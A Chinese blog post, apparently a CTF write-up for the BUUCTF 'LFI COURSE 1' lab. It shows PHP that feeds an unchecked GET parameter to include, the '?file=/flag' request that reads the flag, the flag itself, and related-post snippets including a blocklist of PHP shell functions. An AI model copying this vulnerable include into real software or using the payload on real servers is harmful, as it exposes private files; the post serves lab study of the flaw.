【CTF Web】BUUCTF BUU LFI COURSE 1 Writeup(代码审计+PHP+文件包含漏洞)

于 2024-06-01 12:50:49 发布
阅读量572 收藏 2
点赞数 18
分类专栏: CTF Writeup 文章标签: 前端 php 安全 网络安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34988204/article/details/137894311
版权

BUU LFI COURSE 1

1
点击启动靶机。

解法

<?php
/**
 * Created by PhpStorm.
 * User: jinzhao
 * Date: 2019/7/9
 * Time: 7:07 AM
 */

highlight_file(__FILE__);

if(isset($_GET['file'])) {
    $str = $_GET['file'];

    include $_GET['file'];
}

如果GET请求中接收到file参数,就会引入该参数指定的文件。

http://e498b816-7fd3-4c0f-bd5d-8f458556065c.node5.buuoj.cn:81/?file=/flag

Flag

flag{7b7743d3-f852-4d64-af34-50015ca21cf0}

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

HEX9CF
关注
  • 18
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
网络安全+CTF+源码审计+O泡易支付V1.zip
11-19
网络安全领域,CTF(Capture The Flag)是一种流行的学习和竞技方式,它涵盖了各种安全技能,包括源码审计。在这个“网络安全+CTF+源码审计+O泡易支付V1.zip”压缩包中,我们可以推测它包含了一个用于CTF挑战的...
BUUCTF-Basic部分(4道)
weixin_45908624的博客
05-24 1708
buuctf
BUUCTF BUU LFI COURSE 1
m0_49025459的博客
04-10 1431
题目 代码 <?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/7/9 * Time: 7:07 AM */ highlight_file(__FILE__); if(isset($_GET['file'])) { $str = $_GET['file']; include $_GET['file']; } 直接修改url http://3b1ee075-5de2-4de4-b1e.
BUUCTFBUU LFI COURSE 1 1
最新发布
qq_41369524的博客
12-06 1260
尝试退到根目录去寻找flag,也就是四次…可以看到有include,判断是文件包含漏洞。用的是get传参,且参数为file。发现需要传入一个路径才能行。
BuuCTF- Basic-BUU LFI COURSE 1
m0_53932372的博客
12-31 952
文件包含类题目,关键在于阅读代码: highlight_file(__FILE__); if(isset($_GET['file'])) { $str = $_GET['file']; include $_GET['file']; } highlight_file(FILE); 语法高亮一个文件。 isset 判断一个变量是否已设置, 即变量已被声明,且其值不为 null。 可以理解为$var = $_GET[‘var’],这样正是答案的写法: node4.buuoj.cn:81/?f
[BUUCTF][PHP本地文件包含]LFI COURSE 1
Terran1ight的博客
03-09 4896
<?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/7/9 * Time: 7:07 AM */ highlight_file(__FILE__); if(isset($_GET['file'])) { $str = $_GET['file']; include $_GET['file']; } 点进去后就上面一段PHP代码审计,根据不断的百度翻译各种函数的意思,觉得应该是本地文件包含 看了别.
CTF工具之seay源代码审计系统(web).rar
09-16
seay源代码审计系统针对Web应用的常见漏洞,如SQL注入、跨站脚本(XSS)、文件包含漏洞、命令注入、信息泄漏等进行了专门的设计和优化。这些漏洞往往源于程序员在编写代码时对输入验证不足或不当,使得攻击者可以...
你不知道的文件上传漏洞php代码分析
12-18
文件处理一般包含两项功能,用户上传和展示文件,如上传头像。 文件上传攻击示例 upload.php <?php $uploaddir = 'uploads/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if (move_...
buuoj re逆向1-64题writeup(截图+c++源码+过程).rar
12-31
buuoj re逆向1-64题writeup(截图+c++源码+过程) 与前面发的一模一样,只不过打包了,喜欢的可以支持一下
[BUUCTF]-Basic-BUU LFI COURSE 1
yzl_007的博客
08-27 1199
[BUUCTF]-Basic-BUU LFI COURSE 1 打开地址 简单的文件包含 <?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/7/9 * Time: 7:07 AM */ highlight_file(__FILE__); if(isset($_GET['file'])) { $str = $_GET['file']; include $_GET['file']; } paylo
BUUCTF - Web - PHP
1tachi的博客
11-27 455
敏感文件泄露 访问www.zip 解压 class.php中是PHP源码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = .
Buuctf PHPweb
weixin_51313108的博客
09-07 387
PHPWeb考点WP 考点 PHP回调函数 反序列化代码执行 系统命令执行(find查找文件) 参考连接:PHP命令执行&代码执行 WP 页面读取不到什么信息,抓个包看到传了俩个参数 func,p。猜测可能是function和parameter。 试试一下查看源代码 <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","
BUUCTF——phpweb
weixin_45864041的博客
04-17 624
打开题目 可以看到页面上的时间每5秒刷新一次,所以我们直接抓包看页面的数据提交 由页面提交的两个参数可以看到,第一个func是函数名,第二个是传入函数的参数。 所以可以用php的readfile()函数读取index.php的源码。 <?php $disable_fun = array("exec","shell_exec","system","passthru", "proc_open","show_source","phpinfo","popen","dl","eval", "
buuctf-web-[极客大挑战 2019]PHP
weixin_46079186的博客
07-02 319
题目地址 1.打开题目 提到网站备份我们直接扫描一下网站备份文件,御剑啥的都行,线程一定不要开太大,开5就行开太大可能扫描不出来。扫描到一个www.zip 下载文件打开 打开index.php,应该是反序列化 打开class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; // 私有变量只有本类可以使用 privat
BUUCTF-Web】 [极客大挑战 2019]PHP
RexHa的博客
09-04 732
BUUCTF-Web】 [极客大挑战 2019]PHP
BUUCTF WEB [极客大挑战 2019]PHP
Y1da的博客
04-16 962
BUUCTF WEB [极客大挑战 2019]PHP 题目提示网站存在备份,使用御剑扫描目录,发现备份文件 http://9ce7b58e-0829-4ed4-b7ca-7a1b7fd02741.node4.buuoj.cn:81/www.zip 下载后解压,得到index.php、class.php、flag.php等文件。 index.php(部分代码) <?php include 'class.php'; $select = $_GET['select']; $res=unser

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值